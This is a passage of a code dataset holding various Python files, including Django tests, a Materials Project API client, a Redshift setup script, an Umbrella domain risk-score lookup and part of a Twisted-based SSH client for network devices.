self).__init__(\"sb-signature\", **kwargs)\n self._report = report\n self._software = software\n self.generate_attributes()\n\n def generate_attributes(self):\n ''' Parse the report for relevant attributes '''\n self.add_attribute(\"software\", value=self._software, type=\"text\")\n for (name, description) in self._report: \n self.add_attribute(\"signature\", value=name, comment=description, type=\"text\") \n ","sub_path":"pymisp/tools/sbsignatureobject.py","file_name":"sbsignatureobject.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592504403","text":"#coding=utf-8\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom compute.models import Center, Group\nfrom ..center import get_list\n\nfrom .tools import create_user, create_group, create_center\n\n\n\nclass CenterTest(TestCase):\n def setUp(self):\n self.u1 = create_user('apitest') \n self.c1 = create_center('测试中心', '北京', '备注')\n self.g1 = create_group(self.c1, '测试', '测试', [self.u1])\n self.c2 = create_center('测试中心2', '北京', '备注2') \n \n def test_get_list(self):\n res = get_list({'req_user': self.u1})\n self.assertDictEqual(res, {'res': True, \n 'list': [\n {'id': self.c1.id, \n 'name': self.c1.name, \n 'location': self.c1.location, \n 'desc': self.c1.desc,\n 'order': 0}\n ]})\n res2 = get_list({})\n self.assertDictContainsSubset({'res': False}, res2)\n\n res3 = get_list({'req_user': 'test'})\n self.assertDictContainsSubset({'res': False}, res3)","sub_path":"api/tests/test_center.py","file_name":"test_center.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"70221231","text":"\"\"\"\nEXERCÍCIO 046: Contagem Regressiva\n\nFaça um programa que mostre na tela uma contagem regressiva para o estouro de\nfogos de artifício, indo de 10 até 0, com uma pausa de 1 segundo entre eles.\n\"\"\"\n\nfrom time import sleep\n\ndef main():\n for i in range(10, 0, -1):\n print(i)\n sleep(1)\n print('*FOGOS DE ARTIFICIO*')\n\nif __name__ == '__main__':\n main()\n","sub_path":"introducao/exercicio046.py","file_name":"exercicio046.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152398665","text":"from collections import defaultdict\nfrom typing import Optional, List, Tuple\nfrom mp_api.core.client import BaseRester\nfrom emmet.core.thermo import ThermoDoc\nfrom pymatgen.core.periodic_table import Element\n\n\nclass ThermoRester(BaseRester):\n\n suffix = \"thermo\"\n document_model = ThermoDoc # type: ignore\n supports_versions = True\n primary_key = \"material_id\"\n\n def search_thermo_docs(\n self,\n material_ids: Optional[List[str]] = None,\n chemsys_formula: Optional[str] = None,\n nelements: Optional[Tuple[int, int]] = None,\n is_stable: Optional[bool] = None,\n total_energy: Optional[Tuple[float, float]] = None,\n formation_energy: Optional[Tuple[float, float]] = None,\n energy_above_hull: Optional[Tuple[float, float]] = None,\n equillibrium_reaction_energy: Optional[Tuple[float, float]] = None,\n uncorrected_energy: Optional[Tuple[float, float]] = None,\n sort_field: Optional[str] = None,\n ascending: Optional[bool] = None,\n num_chunks: Optional[int] = None,\n chunk_size: int = 1000,\n all_fields: bool = True,\n fields: Optional[List[str]] = None,\n ):\n \"\"\"\n Query core material docs using a variety of search criteria.\n\n Arguments:\n material_ids (List[str]): List of Materials Project IDs to return data for.\n chemsys_formula (str): A chemical system (e.g., Li-Fe-O),\n or formula including anonomyzed formula\n or wild cards (e.g., Fe2O3, ABO3, Si*).\n nelements (Tuple[int,int]): Minimum and maximum number of elements in the material to consider.\n is_stable (bool): Whether the material is stable.\n total_energy (Tuple[float,float]): Minimum and maximum corrected total energy in eV/atom to consider.\n formation_energy (Tuple[float,float]): Minimum and maximum formation energy in eV/atom to consider.\n energy_above_hull (Tuple[float,float]): Minimum and maximum energy above the hull in eV/atom to consider.\n equillibrium_reaction_energy (Tuple[float,float]): Minimum and maximum equilibrium reaction energy\n in eV/atom to consider.\n uncorrected_energy (Tuple[float,float]): Minimum and maximum uncorrected total\n energy in eV/atom to consider.\n sort_field (str): Field used to sort results.\n ascending (bool): Whether sorting should be in ascending order.\n num_chunks (int): Maximum number of chunks of data to yield. None will yield all possible.\n chunk_size (int): Number of data entries per chunk.\n all_fields (bool): Whether to return all fields in the document. Defaults to True.\n fields (List[str]): List of fields in ThermoDoc to return data for.\n Default is material_id and last_updated if all_fields is False.\n\n Returns:\n ([ThermoDoc]) List of thermo documents\n \"\"\"\n\n query_params = defaultdict(dict) # type: dict\n\n if chemsys_formula:\n query_params.update({\"formula\": chemsys_formula})\n\n if material_ids:\n query_params.update({\"material_ids\": \",\".join(material_ids)})\n\n if nelements:\n query_params.update(\n {\"nelements_min\": nelements[0], \"nelements_max\": nelements[1]}\n )\n\n if is_stable is not None:\n query_params.update({\"is_stable\": is_stable})\n\n if sort_field:\n query_params.update({\"sort_field\": sort_field})\n\n if ascending is not None:\n query_params.update({\"ascending\": ascending})\n\n name_dict = {\n \"total_energy\": \"energy_per_atom\",\n \"formation_energy\": \"formation_energy_per_atom\",\n \"energy_above_hull\": \"energy_above_hull\",\n \"equillibrium_reaction_energy\": \"equillibrium_reaction_energy_per_atom\",\n \"uncorrected_energy\": \"uncorrected_energy_per_atom\",\n }\n\n for param, value in locals().items():\n if \"energy\" in param and value:\n query_params.update(\n {\n \"{}_min\".format(name_dict[param]): value[0],\n \"{}_max\".format(name_dict[param]): value[1],\n }\n )\n\n query_params = {\n entry: query_params[entry]\n for entry in query_params\n if query_params[entry] is not None\n }\n\n return super().search(\n num_chunks=num_chunks,\n chunk_size=chunk_size,\n all_fields=all_fields,\n fields=fields,\n **query_params,\n )\n","sub_path":"src/mp_api/routes/thermo/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374623585","text":"import configparser # Parse configuration file\nimport psycopg2 # PostgreSQL database adapter for the Python\nimport sys # Used for exiting python script in case of error\n#from no_op_sql_queries import create_table_queries, drop_table_queries #Non-Optimized DWH Tables\nfrom sql_queries import create_table_queries, drop_table_queries # SQL query definitions\n\n\"\"\"\nPurpose:\n Loops through drop_table_queries list and runs drop table queries\n drop_table_queries are defined in sql_queries file\nArg:\n cur - Redshift connection cursor [Required]\n conn - Redshift connection [Required]\n\"\"\"\ndef drop_tables(cur, conn):\n num_queries = len(drop_table_queries)\n query_count = 0\n for query in drop_table_queries:\n query_count += 1\n print(\"Running \", query_count, \"/\", num_queries, \" drop table queries\")\n cur.execute(query)\n conn.commit()\n\n\"\"\"\nPurpose:\n Loops through create_table_queries list and runs create table queries\n create_table_queries are defined in sql_queries file\nArg:\n cur - Redshift connection cursor [Required]\n conn - Redshift connection [Required]\n\"\"\"\ndef create_tables(cur, conn):\n num_queries = len(create_table_queries)\n query_count = 0\n for query in create_table_queries:\n query_count += 1\n print(\"Running \", query_count, \"/\", num_queries, \" create table queries\")\n cur.execute(query)\n conn.commit()\n\n\"\"\"\nPurpose:\n Reads Redshift Cluster connection info stored in dwh.cfg config file\n Connects to cluster using config details and retrieves Connection and Cursor handle\n Upon connecting successfully, calls drop_tables() and create_table() functions\n\"\"\"\ndef main():\n config = configparser.ConfigParser()\n # Open and Read config file to retrieve Cluster and DWH details required to connect\n print(\"Reading 'dwh.cfg' Config file...\")\n try:\n config.read('dwh.cfg')\n print(\"Complete reading 'dwh.cfg' Config file\")\n except Exception as e:\n print(\"Error reading Config file: \", e)\n sys.exit()\n\n # Creating a connection using Cluster and DWH details stored in config file\n print(\"Connecting to Data Warehouse...\")\n try:\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n print(\"Connected to Data Warehouse\")\n except Exception as e:\n print(\"Error connecting Data Warehouse: \", e)\n sys.exit()\n\n # Getting conection cursor\n print(\"Getting Cursor\")\n try:\n cur = conn.cursor()\n print(\"Connection cursor retrieved\")\n except Exception as e:\n print(\"Error getting connection cursor: \", e)\n print(\"Closing connection to data warehouse...\")\n conn.close()\n sys.exit()\n\n # Running Drop Table queries\n print(\"Running Drop Table queries...\")\n try:\n drop_tables(cur, conn)\n print(\"Drop table queries complete\")\n except Exception as e:\n print(\"Error dropping tables: \", e)\n print(\"Closing connection to data warehouse...\")\n conn.close()\n sys.exit()\n\n # Running Create Table queries\n print(\"Running Create Table queries...\")\n try:\n create_tables(cur, conn)\n print(\"Create table queries complete\")\n except Exception as e:\n print(\"Error creating tables: \", e)\n print(\"Closing connection to data warehouse...\")\n conn.close()\n sys.exit()\n\n # Closing connection\n print(\"Closing connection to data warehouse...\")\n conn.close()\n\n\n\"\"\"\n Run above code if the file is labled __main__\n Python internally labels files at runtime to differentiate between imported files and main file\n\"\"\"\nif __name__ == \"__main__\":\n main()\n","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558555876","text":"string = \"bien le bonjour !\"\n\nfor i, j in zip(string[::2],string[1::2]):\n newString = (i.lower() + j.upper())\n print(newString,end=\"\") \n \nret = \"\"\ni = True\nfor x in string:\n print(i)\n if i:\n ret += x.upper()\n else:\n ret += x.lower()\n if x != \" \":\n i = not i\nprint(ret)\n\n\n# for i in string:\n# i = not i\n# print(i)\n","sub_path":"Python/Majuscule.py","file_name":"Majuscule.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"380344911","text":"# import warnings\n# warnings.simplefilter('error', DeprecationWarning)\n\nfrom django.conf.urls.defaults import patterns\nfrom django.views.generic.list import ListView\nfrom directory.models import Club\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = patterns(\n 'directory.views',\n (r'^$', 'index'),\n (r'^analytics\\.html$', 'analytics'),\n (r'^country/(?P[a-zA-Z -]+)/$', 'country'),\n (r'^(?P[a-z]{2})-clubs\\.html$', 'state'),\n (r'^city/(?P\\d+)/(?:(?P[\\w-]+)-clubs\\.html)?$', 'city'),\n (r'^(?P[a-z]{2})-hookups\\.html$', 'state2'),\n (r'^club/(?P\\d+)/(?:(?P[\\w-]+)\\.html)?$', 'club'),\n (r'^club/change/(?P\\d+)/$', 'change_club'),\n (r'^club/added/(?P\\d+)/$', 'club_added'),\n (r'^clubs/$', 'clubs'),\n (r'^club/take/(?P\\d+)/$', 'take_club'),\n (r'^club/add/$', 'add_club'),\n (r'^hookup/(?P\\d+)/(?:(?P[\\w-]+)\\.html)?$', 'hookup'),\n (r'^ajax/get-country-cities/$', 'ajax_get_country_cities'),\n (r'^tradingmap\\.html$', 'tradingmap'),\n (r'^csvmap\\.csv$', 'csvmap'),\n)\n\n# redirect url for club\nurlpatterns += patterns('', (r'^shorturl/(?P\\d+)/$', ListView.as_view, {\n 'queryset': Club.objects.all(),\n 'template_name': 'directory/shorturl.html',\n 'template_object_name': 'club'\n}),\n)\n\n# urls for admin_views functions\nurlpatterns += patterns(\n 'directory.admin_views',\n (r'state/(?P\\d+)/$', 'state_cities'),\n (r'geocoder/$', 'geocoder_proxy'),\n (r'current_state/$', 'get_current_state'),\n)\n\nif settings.DEBUG:\n # add one of these for every non-static root you want to serve\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n # this take cares of static media (i.e. bundled in apps, and specified in settings)\n urlpatterns += staticfiles_urlpatterns()\n","sub_path":"apps/directory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248646279","text":"import numpy as py\r\nfrom numpy import array as numpyarray\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.models import load_model\r\nimport random\r\n\r\nMODEL_FILE = \"model_18_5000.h5\"\r\nMODEL2_FILE = \"model_18_5000.h5\"\r\n\r\nmodel = load_model(MODEL_FILE)\r\nmodel2 = load_model(MODEL2_FILE)\r\n\r\nround_played = 0\r\n\r\nnetwork_prediction = 0\r\nnetwork2_prediction = 0\r\n\r\nnetwork_wins = 0\r\nnetwork2_wins = 0\r\n\r\nmodel_size = 18\r\nmodel2_size = 18\r\n\r\n#human_wins = 0\r\ndraw = 0\r\nmoves = []\r\nmoves2 = []\r\n\r\nwhile True:\r\n try:\r\n rounds = int(input(\"How many rounds you would like to play?\"))\r\n except ValueError:\r\n print(\"Please enter valid number\")\r\n else:\r\n break\r\n\r\ndef rules(num):\r\n if num == 0:\r\n return \"rock\"\r\n if num == 1:\r\n return \"paper\"\r\n if num == 2:\r\n return \"scissors\"\r\n\r\ndef result():\r\n global network_wins\r\n global network2_wins\r\n global round_played\r\n round_played += 1\r\n if network_prediction == network2_prediction:\r\n print(\"draw\")\r\n elif(network_prediction == ((network2_prediction +1)%3)):\r\n network_wins += 1\r\n print(\"network 1 wins\")\r\n elif(network2_prediction == ((network_prediction +1)%3)):\r\n network2_wins += 1\r\n print(\"network 2 wins\")\r\n print(\" network 1 won \" , network_wins , \" network 2 won \" , network2_wins , \" round played \" , round_played )\r\n print(\"Winrate of neural network 1 = \" , network_wins/round_played*100 , \"%\" , \" Winrate of neural network 2 = \", network2_wins/round_played*100 , \"%\")\r\n\r\n\r\nfor i in range(rounds):\r\n while len(moves)model_size:\r\n del moves[0]\r\n\r\n while len(moves2)model2_size:\r\n del moves2[0]\r\n print(\"network 1 : \" , rules(network_prediction))\r\n print(\"network 2 : \" , rules(network2_prediction))\r\n result()\r\n","sub_path":"neural_rps.py","file_name":"neural_rps.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409661612","text":"import requests\nimport json\n\nhost = \"investigate.api.umbrella.com\"\napi_key = \"a0b1c2d3-e4f5-g6h7-i8j9-kalbmcndoepf\"\ndomain = \"internetbadguys.com\"\n\nprint(f\"\\n==> Checking domain against Umbrella Investigate to get risk score\")\n\nurl = f\"https://{host}/domains/risk-score/{domain}\"\nheaders = {'Authorization':'Bearer ' + api_key}\n\ntry:\n\tresponse = requests.get(url, headers=headers)\nexcept:\n\tresponse.raise_for_status()\n\nprint (domain)\nprint (response.json())","sub_path":"sample-code/umbrella-single-domain-risk-score.py","file_name":"umbrella-single-domain-risk-score.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135812846","text":"# This file is part of utils.\n#\n# Developed for the LSST Data Management System.\n# This product includes software developed by the LSST Project\n# (https://www.lsst.org).\n# See the COPYRIGHT file at the top-level directory of this distribution\n# for details of code ownership.\n#\n# Use of this source code is governed by a 3-clause BSD-style\n# license that can be found in the LICENSE file.\n\n__all__ = [\"get_caller_name\"]\n\nimport inspect\n\n\ndef get_caller_name(skip: int = 2) -> str:\n \"\"\"Get the name of the caller method.\n\n Any item that cannot be determined (or is not relevant, e.g. a free\n function has no class) is silently omitted, along with an\n associated separator.\n\n Parameters\n ----------\n skip : `int`\n How many levels of stack to skip while getting caller name;\n 1 means \"who calls me\", 2 means \"who calls my caller\", etc.\n\n Returns\n -------\n name : `str`\n Name of the caller as a string in the form ``module.class.method``.\n An empty string is returned if ``skip`` exceeds the stack height.\n\n Notes\n -----\n Adapted from from http://stackoverflow.com/a/9812105\n by adding support to get the class from ``parentframe.f_locals['cls']``\n \"\"\"\n stack = inspect.stack()\n start = 0 + skip\n if len(stack) < start + 1:\n return ''\n parentframe = stack[start][0]\n\n name = []\n module = inspect.getmodule(parentframe)\n if module:\n name.append(module.__name__)\n # add class name, if any\n if 'self' in parentframe.f_locals:\n name.append(type(parentframe.f_locals['self']).__name__)\n elif 'cls' in parentframe.f_locals:\n name.append(parentframe.f_locals['cls'].__name__)\n codename = parentframe.f_code.co_name\n if codename != '': # top level usually\n name.append(codename) # function or a method\n return \".\".join(name)\n","sub_path":"python/lsst/utils/get_caller_name.py","file_name":"get_caller_name.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235525501","text":"#!/usr/bin/python\n# Copyright (c) 2020, the Dart project authors. Please see the AUTHORS file\n# for details. All rights reserved. Use of this source code is governed by a\n# BSD-style license that can be found in the LICENSE file.\n\nimport json\nimport os.path\nimport sys\n\n\ndef _get_browser_compat_data():\n current_dir = os.path.dirname(__file__)\n\n browser_compat_folder = os.path.abspath(\n os.path.join(current_dir, '..', '..', '..', 'third_party', 'mdn',\n 'browser-compat-data', 'src'))\n\n if not os.path.exists(browser_compat_folder):\n raise RuntimeError('Browser compatibility data not found at %s' %\n browser_compat_folder)\n\n browser_compat_data = {}\n\n INCLUDE_DIRS = [\n 'api',\n 'html',\n 'svg',\n # TODO(srujzs): add more if needed\n ]\n\n # Transform to absolute paths\n INCLUDE_DIRS = [\n os.path.join(browser_compat_folder, dir) for dir in INCLUDE_DIRS\n ]\n\n def process_json_dict(json_dict):\n # Returns a tuple of the interface name and the metadata corresponding\n # to it.\n if 'api' in json_dict:\n # Get the interface name\n api_dict = json_dict['api']\n interface_name = api_dict.keys()[0]\n return (interface_name, api_dict[interface_name])\n elif 'html' in json_dict:\n html_dict = json_dict['html']\n if 'elements' in html_dict:\n elements_dict = html_dict['elements']\n element_name = elements_dict.keys()[0]\n # Convert to WebCore name\n interface = str('HTML' + element_name + 'Element')\n return (interface, elements_dict[element_name])\n elif 'svg' in json_dict:\n svg_dict = json_dict['svg']\n if 'elements' in svg_dict:\n elements_dict = svg_dict['elements']\n element_name = elements_dict.keys()[0]\n # Convert to WebCore name\n interface = str('SVG' + element_name + 'Element')\n return (interface, elements_dict[element_name])\n return (None, None)\n\n def visitor(arg, dir_path, names):\n\n def should_process_dir(dir_path):\n if os.path.abspath(dir_path) == browser_compat_folder:\n return True\n for dir in INCLUDE_DIRS:\n if dir_path.startswith(dir):\n return True\n return False\n\n if should_process_dir(dir_path):\n for name in names:\n file_name = os.path.join(dir_path, name)\n (interface_path, ext) = os.path.splitext(file_name)\n if ext == '.json':\n with open(file_name) as src:\n json_dict = json.load(src)\n interface, metadata = process_json_dict(json_dict)\n if not interface is None:\n # Note: interface and member names do not\n # necessarily have the same capitalization as\n # WebCore, so we keep them all lowercase for easier\n # matching later.\n interface = interface.lower()\n metadata = {\n member.lower(): info\n for member, info in metadata.items()\n }\n\n if interface in browser_compat_data:\n browser_compat_data[interface].update(metadata)\n else:\n browser_compat_data[interface] = metadata\n else:\n names[:] = [] # Do not go underneath\n\n os.path.walk(browser_compat_folder, visitor, browser_compat_folder)\n\n return browser_compat_data\n\n\nclass MDNReader(object):\n # Statically initialize and treat as constant.\n _BROWSER_COMPAT_DATA = _get_browser_compat_data()\n\n def __init__(self):\n self._compat_overrides = {}\n\n def _get_attr_compatibility(self, compat_data):\n # Parse schema syntax of MDN data:\n # https://github.com/mdn/browser-compat-data/blob/master/schemas/compat-data.schema.json\n\n # For now, we will require support for browsers since the last IDL roll.\n # TODO(srujzs): Determine if this is too conservative.\n browser_version_map = {\n 'chrome': 63,\n 'firefox': 57,\n 'safari': 11,\n # We still support the latest version of IE.\n 'ie': 11,\n 'opera': 50,\n }\n version_key = 'version_added'\n for browser in browser_version_map.keys():\n support_data = compat_data['support']\n if browser not in support_data:\n return False\n support_statement = support_data[browser]\n if isinstance(support_statement, list): # array_support_statement\n # TODO(srujzs): Parse this list to determine compatibility. Will\n # likely require parsing for 'version_removed' keys. Notes about\n # which browser version enabled this attribute for which\n # platform also complicates things. For now, we assume it's not\n # compatible.\n return False\n if len(support_statement.keys()) > 1:\n # If it's anything more complicated than 'version_added', like\n # 'notes' that specify platform versions, we assume it's not\n # compatible.\n return False\n version = support_statement[version_key]\n if not version or browser_version_map[browser] < float(version):\n # simple_support_statement\n return False\n # If the attribute is experimental, we assume it's not compatible.\n status_data = compat_data['status']\n experimental_key = 'experimental'\n if experimental_key in status_data and \\\n status_data[experimental_key]:\n return False\n return True\n\n def is_compatible(self, attribute):\n # Since capitalization isn't consistent across MDN and WebCore, we\n # compare lowercase equivalents for interface and attribute names.\n interface = attribute.doc_js_interface_name.lower()\n if interface in self._BROWSER_COMPAT_DATA and attribute.id and len(\n attribute.id) > 0:\n interface_dict = self._BROWSER_COMPAT_DATA[interface]\n id_name = attribute.id.lower()\n secure_context_key = 'isSecureContext'\n if interface in self._compat_overrides and id_name in self._compat_overrides[\n interface]:\n return self._compat_overrides[interface][id_name]\n elif secure_context_key in interface_dict:\n # If the interface requires a secure context, all attributes are\n # implicitly incompatible.\n return False\n elif id_name in interface_dict:\n id_data = interface_dict[id_name]\n return self._get_attr_compatibility(id_data['__compat'])\n else:\n # Might be an attribute that is defined in a parent interface.\n # We defer until attribute emitting to determine if this is the\n # case. Otherwise, return None.\n pass\n return None\n\n def set_compatible(self, attribute, compatible):\n # Override value in the MDN browser compatibility data.\n if not compatible in [True, False, None]:\n raise ValueError('Cannot set a non-boolean object for compatible')\n interface = attribute.doc_js_interface_name.lower()\n if not interface in self._compat_overrides:\n self._compat_overrides[interface] = {}\n if attribute.id and len(attribute.id) > 0:\n id_name = attribute.id.lower()\n self._compat_overrides[interface][id_name] = compatible\n","sub_path":"tools/dom/scripts/mdnreader.py","file_name":"mdnreader.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"201185265","text":"from commands import getoutput\nfrom os import system\nimport sys\n\ndef main():\n for issue in get_issue_commits(sys.argv[1]):\n system(\"git revert --no-edit \" + issue)\n\ndef get_issue_commits(issue):\n issues = []\n\n for line in get_log().split('\\n'):\n if issue in line:\n issues.append(line.split()[0])\n\n return issues\n\ndef get_log():\n log = getoutput(\"git log --pretty=oneline --abbrev-commit --date=relative\")\n\n return log\n\nmain()\n","sub_path":"git-revert-by-issue.py","file_name":"git-revert-by-issue.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481637324","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nLogin and basic command-line interaction support using the Twisted asynchronous\nI/O framework. The Trigger Twister is just like the Mersenne Twister, except\nnot at all.\n\"\"\"\n\nimport fcntl\nimport os\nimport re\nimport signal\nimport struct\nimport sys\nimport tty\nfrom copy import copy\nfrom collections import deque\nfrom crochet import wait_for, run_in_reactor, setup, EventLoop\n\nsetup()\n\nfrom twisted.conch.ssh import session, common\nfrom twisted.conch.ssh.channel import SSHChannel\nfrom twisted.conch.endpoints import (SSHCommandClientEndpoint,\n _NewConnectionHelper,\n _ExistingConnectionHelper,\n _CommandTransport, TCP4ClientEndpoint,\n connectProtocol,\n _UserAuth,\n _ConnectionReady)\nfrom twisted.internet import defer, protocol, reactor, threads\nfrom twisted.internet.task import LoopingCall\nfrom twisted.protocols.policies import TimeoutMixin\nfrom twisted.python import log\n\nfrom trigger.conf import settings\nfrom trigger import tacacsrc, exceptions\nfrom trigger.twister import is_awaiting_confirmation, has_ioslike_error, TriggerSSHUserAuth\nfrom twisted.internet import reactor\n\n\n@run_in_reactor\ndef generate_endpoint(device):\n \"\"\"Generate Trigger endpoint for a given device.\n\n The purpose of this function is to generate endpoint clients for use by a `~trigger.netdevices.NetDevice` object.\n\n :param device: `~trigger.netdevices.NetDevice` object\n \"\"\"\n creds = tacacsrc.get_device_password(device.nodeName)\n return TriggerSSHShellClientEndpointBase.newConnection(\n reactor, creds.username, device, password=creds.password\n )\n\nclass SSHSessionAddress(object):\n \"\"\"This object represents an endpoint's session details.\n\n This object would typically be loaded as follows:\n\n :Example:\n >>> sess = SSHSessionAddress()\n >>> sess.server = \"1.2.3.4\"\n >>> sess.username = \"cisco\"\n >>> sess.command = \"\"\n \n We load command with a null string as Cisco device's typically do not support bash!\n \"\"\"\n def __init__(self, server, username, command):\n self.server = server\n self.username = username\n self.command = command\n\n\nclass _TriggerShellChannel(SSHChannel):\n \"\"\"This is the Trigger subclassed Channel object.\n \"\"\"\n name = b'session'\n\n def __init__(self, creator, command, protocolFactory, commandConnected, incremental,\n with_errors, prompt_pattern, timeout, command_interval):\n SSHChannel.__init__(self)\n self._creator = creator\n self._protocolFactory = protocolFactory\n self._command = command\n self._commandConnected = commandConnected\n self.incremental = incremental\n self.with_errors = with_errors\n self.prompt = prompt_pattern\n self.timeout = timeout\n self.command_interval = command_interval\n self._reason = None\n\n def openFailed(self, reason):\n \"\"\"Channel failed handler.\"\"\"\n self._commandConnected.errback(reason)\n\n\n def channelOpen(self, ignored):\n \"\"\"Channel opened handler.\n \n Once channel is opened, setup the terminal environment and signal\n endpoint to load the shell subsystem.\n \"\"\"\n pr = session.packRequest_pty_req(os.environ['TERM'],\n self._get_window_size(), '')\n self.conn.sendRequest(self, 'pty-req', pr)\n\n command = self.conn.sendRequest(\n self, 'shell', '', wantReply=True)\n # signal.signal(signal.SIGWINCH, self._window_resized)\n command.addCallbacks(self._execSuccess, self._execFailure)\n\n def _window_resized(self, *args):\n \"\"\"Triggered when the terminal is rezied.\"\"\"\n win_size = self._get_window_size()\n new_size = win_size[1], win_size[0], win_size[2], win_size[3]\n self.conn.sendRequest(self, 'window-change',\n struct.pack('!4L', *new_size))\n\n def _get_window_size(self):\n \"\"\"Measure the terminal.\"\"\"\n stdin_fileno = sys.stdin.fileno()\n winsz = fcntl.ioctl(stdin_fileno, tty.TIOCGWINSZ, '12345678')\n return struct.unpack('4H', winsz)\n\n def _execFailure(self, reason):\n \"\"\"Callback for when the exec command fails.\n \"\"\"\n self._commandConnected.errback(reason)\n\n\n def _execSuccess(self, ignored):\n \"\"\"Callback for when the exec command succees.\n \"\"\"\n self._protocol = self._protocolFactory.buildProtocol(\n SSHSessionAddress(\n self.conn.transport.transport.getPeer(),\n self.conn.transport.creator.username,\n self._command\n ))\n self._bind_protocol_data()\n self._protocol.makeConnection(self)\n self._commandConnected.callback(self._protocol)\n\n def _bind_protocol_data(self):\n \"\"\"Helper method to bind protocol related attributes to the channel.\n \"\"\"\n # This was a string before, now it's a NetDevice.\n self._protocol.device = self.conn.transport.creator.device or None\n\n # FIXME(jathan): Is this potentially non-thread-safe?\n self._protocol.startup_commands = copy(\n self._protocol.device.startup_commands\n )\n\n self._protocol.incremental = self.incremental or None\n self._protocol.prompt = self.prompt or None\n self._protocol.with_errors = self.with_errors or None\n self._protocol.timeout = self.timeout or None\n self._protocol.command_interval = self.command_interval or None\n\n def dataReceived(self, data):\n \"\"\"Callback for when data is received.\n\n Once data is received in the channel we defer to the protocol level dataReceived method.\n \"\"\"\n self._protocol.dataReceived(data)\n # SSHChannel.dataReceived(self, data)\n\n\nclass _TriggerUserAuth(_UserAuth):\n \"\"\"Perform user authentication over SSH.\"\"\"\n # The preferred order in which SSH authentication methods are tried.\n preferredOrder = settings.SSH_AUTHENTICATION_ORDER\n\n def getPassword(self, prompt=None):\n \"\"\"Send along the password.\"\"\"\n log.msg('Performing password authentication', debug=True)\n return defer.succeed(self.password)\n\n def getGenericAnswers(self, name, information, prompts):\n \"\"\"\n Send along the password when authentication mechanism is not 'password'\n This is most commonly the case with 'keyboard-interactive', which even\n when configured within self.preferredOrder, does not work using default\n getPassword() method.\n \"\"\"\n log.msg('Performing interactive authentication', debug=True)\n log.msg('Prompts: %r' % prompts, debug=True)\n\n # The response must always a sequence, and the length must match that\n # of the prompts list\n response = [''] * len(prompts)\n for idx, prompt_tuple in enumerate(prompts):\n prompt, echo = prompt_tuple # e.g. [('Password: ', False)]\n if 'assword' in prompt:\n log.msg(\"Got password prompt: %r, sending password!\" % prompt,\n debug=True)\n response[idx] = self.password\n\n return defer.succeed(response)\n\n def ssh_USERAUTH_FAILURE(self, packet):\n \"\"\"\n An almost exact duplicate of SSHUserAuthClient.ssh_USERAUTH_FAILURE\n modified to forcefully disconnect. If we receive authentication\n failures, instead of looping until the server boots us and performing a\n sendDisconnect(), we raise a `~trigger.exceptions.LoginFailure` and\n call loseConnection().\n See the base docstring for the method signature.\n \"\"\"\n canContinue, partial = common.getNS(packet)\n partial = ord(partial)\n log.msg('Previous method: %r ' % self.lastAuth, debug=True)\n\n # If the last method succeeded, track it. If network devices ever start\n # doing second-factor authentication this might be useful.\n if partial:\n self.authenticatedWith.append(self.lastAuth)\n # If it failed, track that too...\n else:\n log.msg('Previous method failed, skipping it...', debug=True)\n self.authenticatedWith.append(self.lastAuth)\n\n def orderByPreference(meth):\n \"\"\"\n Invoked once per authentication method in order to extract a\n comparison key which is then used for sorting.\n @param meth: the authentication method.\n @type meth: C{str}\n @return: the comparison key for C{meth}.\n @rtype: C{int}\n \"\"\"\n if meth in self.preferredOrder:\n return self.preferredOrder.index(meth)\n else:\n # put the element at the end of the list.\n return len(self.preferredOrder)\n\n canContinue = sorted([meth for meth in canContinue.split(',')\n if meth not in self.authenticatedWith],\n key=orderByPreference)\n\n log.msg('Can continue with: %s' % canContinue)\n log.msg('Already tried: %s' % self.authenticatedWith, debug=True)\n return self._cbUserauthFailure(None, iter(canContinue))\n\n def _cbUserauthFailure(self, result, iterator):\n \"\"\"Callback for ssh_USERAUTH_FAILURE\"\"\"\n if result:\n return\n try:\n method = iterator.next()\n except StopIteration:\n msg = (\n 'No more authentication methods available.\\n'\n 'Tried: %s\\n'\n 'If not using ssh-agent w/ public key, make sure '\n 'SSH_AUTH_SOCK is not set and try again.\\n'\n % (self.preferredOrder,)\n )\n self.transport.factory.err = exceptions.LoginFailure(msg)\n self.transport.loseConnection()\n else:\n d = defer.maybeDeferred(self.tryAuth, 